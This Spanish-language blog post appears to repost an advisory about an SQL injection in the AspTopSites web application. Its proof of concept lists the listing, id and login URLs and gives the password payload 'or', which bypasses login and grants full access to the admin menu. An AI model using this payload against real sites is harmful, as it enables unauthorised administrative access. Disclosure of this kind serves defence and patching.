AspTopSites SQL injection...
Producto afectado:
AspTopSites
http://www.maine-net.com/aspts.asp
Detalle:
SQL Injection
AspTopSites no filtra el SQL resultando en el acceso completo al menu de administracion
Prueba de Concepto:
La declaracion de SQl injection en el campo de la contraseña causa que la declaración sea verdad.
http://[host]/topsites/default.asp <--- vea las listas
http://[host]/topsites/goto.asp?id=43 <--- mouseover valor de identificacion
http://[host]/topsites/includeloginuser.asp <--- login aqui
user: [ id value ]
password: 'or'
Fuente:hackers-news
Salu2
publicado por Mousehack a las 7:43 p. m.
0 Comments:
Publicar un comentario
<< Home